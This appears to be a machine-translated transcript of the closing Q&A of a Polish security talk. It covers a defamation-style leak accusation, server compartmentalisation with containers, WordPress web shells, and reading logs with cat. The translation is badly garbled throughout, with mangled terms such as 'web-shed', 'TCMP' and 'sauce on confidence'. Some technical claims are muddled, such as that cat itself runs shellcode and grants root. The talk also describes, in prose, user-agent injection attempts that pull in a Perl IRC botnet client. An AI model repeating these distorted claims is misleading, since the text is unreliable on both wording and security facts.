person is no longer in prison. Did any consequences appear with this or similar threats, let's call it attacks or attempts? From the conversation with the lawyer I had that day, I got 100% certainty that I could convict such a person as a member of the Association of Persons with Legal Assets. about defamation or other type of dignity in a good name, because we as the Security Association were accused of the fact that the data was pulled out, leaked, which is in some way in our authority, so what I could theoretically state if it were true. Because it is not true, and I decided to dig this person, I mean dig, it is said a lot,

I would like to describe it step by step, to use it as a material. I suspect that if I wanted to report it, I would have been banned for the next six months or a year. In fact, the police may have established, maybe not. I'm not sure how it would have happened. Sometimes amateurs see more, sometimes I don't know exactly how my cooperation with the police would have been, sending logs. I'm afraid that in such a silly case, we would make a mockery by announcing it, and not react in this way. Because in my opinion, I responded to his laughter with my laughter. Speaking about it now, I have kept my face in some way. I think that judging by the

dialect used by this person, it would be useless, because she is too young to be a criminal. No, this person, I think, is a full-time person, a resident of a different city than Warsaw, and a person who, in my opinion, and I don't want to say that it's confirmed and so on. It's a person who stands behind such a nickname as Drma Zdzisław, or an mBank consultant. Because it's one person, one joke, what I'm after. All these traces shown by me, I think they were protected in other places, in other situations. And it's too bad to stick it, but yes, I suspect it's a person. Yes, it wouldn't do anything, because here, what would I fight off him? If he

went for 6 months, then he would have another problem, he would pay me 200-500 PLN for the day. It's not about that. For me, PR approach was more important. At that moment, it was about how I would face him or her. Will he do the same as he planned? Will I give up? He won't respond anymore. Any more questions? You can ask about everything, but I won't answer. If there are no questions, and if there are, then seriously, there is a question. I think that the solution can be some kind of compartmentalization, yes. Divide these services, close them in some containers, things that are on the server to limit them. It was implemented thanks to Patryk Radosz, who once sent me via a random

Facebook friend to containers. That's why, yes, I really think that it wasn't about containers, it wasn't about all of it. Even if I cut out the public key, the containers would also fall, right? Because unfortunately, I am a person who likes his key very much. I am attached to it, I have been using it for several years, so if someone wins it, I congratulate him, because it probably wouldn't be possible, but okay. Unless he bought a disc from me for Allegro. But it was there a long time ago and there was no key. Okay, never mind. No, no, the point is that you know what, no, no, no. I think there are some moments when

we actually use containers and keep them in containers. We have a super uber security level. We call it a security zone. On the other hand, this WordPress, on which this page stands, and this server when it all started and we were just getting some solutions, because we were building this infrastructure and it was hard to assemble. So here was a big problem to implement it all at once. Unfortunately, In 2015 one of the prolegents talked about "sauce on confidence" and said: "Let's not rush with all the security at once, let's do it gradually. Because when we rush at once, we'll screw everything up. And when we do it gradually, we'll screw only one thing up."

So I preferred to screw up one thing, that is NGX, than actually rush to the containers, etc. for further security issues. And you will wake up with the fact that someone from container, for example LXC, placed on Debian, went to another container, made a mistake and suddenly it turns out that the whole server is compromised, and not just a piece of WordPress. Because there is always a risk that someone will throw a web-shed on WordPress, go to the user www.data.com, change the page and go. And thank God, the database doesn't move, the git doesn't move, the users don't move. Next question? It's about PR approach, because different companies deal with it. Maybe it would be good to make a presentation

or a tutorial, a best practice on how to handle it. How to behave when they kick me? I'm sure I won't put the other one on the shelf like Jesus, but I'll think about it. I think it can actually appear. I'm a five-pointed guy and it's a mess of cards. I want to extend it a bit, because I have one more thing to say. Okay. So, we read the logs and please tell me... How many admins are there in the room? Hands up, admins, please admit. Yes, devops and possibly security guards. Ok, now tell me, my dear friends, nobody is answering because they know, what error was made in log reading? Was it made? Well,

relatively purposefully, it quickly appeared in the article, noticed by people, we'll see if you notice it. No, the fact that it's from RUT, yes, it's related later, but it's still not it. Yes, I mean, I read files by cat. Why? That's not the right answer. Exactly. Cat is a hole and allows to perform shellcode. So shell injection which was mentioned before. Seriously, if I read logs, these logs, read today, which are cut by my firewall of course, on my firewall there are about 10-15 shell injection tests per day in user agent. It consists of WG, TCMP or other command that pulls file, turns on Perl file with IRC bot to botnet and connecting computer to

botnet. Every time when someone writes a function with cat, or reads logs in PHP through cat, or reads logs through console or any other application using cat, It hurts, because it's running another bot. I know a person who has an app that runs it three times a day. Exactly, it's a remote access, to avoid forgetting the password. There is also another thing, to prove it for you, on Securac there is POC and I recommend to generate some program which will throw from echo those notes -echo -e to file and then make it with cut. For 80% if file is well written, you will get text coloring in cut. without any additional flags. So don't do that either. And the fact that there is

a root, if this error is made and this shellcode appears, it gives the user a root. So this is the second mistake, but less important when I do it with grep. Of course, I should have done it, it would be shorter, but above all when it comes to security. It even has its own CV. Before Piątkosia kicks me out, because he's already kicking me out, not kicking me out, but I'm talking all day. Any additional questions? Grep. Just Grep. You put a file in Grep and you taught it yourself. Right. Nikof taught me how to read logs. Long time ago. When I started. Any more questions? I won't say I recruit because I don't recruit. But if someone wants

to recruit me, I'm open. Okay, I thought so. Every year I say the same thing, nobody wants to recruit me. Okay, so it is: SCP, Social and Contact Page. I like to think out my shortcuts, as the company name itself indicates. If someone is looking for something, the email is here, there is Facebook, there is Twitter. On Facebook I have a funny, maybe not for everyone, fanpage "Bowch Pechat". Sometimes there is some thought, sometimes a funny picture with Cardinal Dziewisz stopping demons. If someone knows what I'm talking about. And sometimes just some sticker, a piece of text that you can pass on to someone. And on a business profile, i.e. this SMS Poland, it will not pass due to reputation issues. I

think that's all. If there are no questions, thank you very much.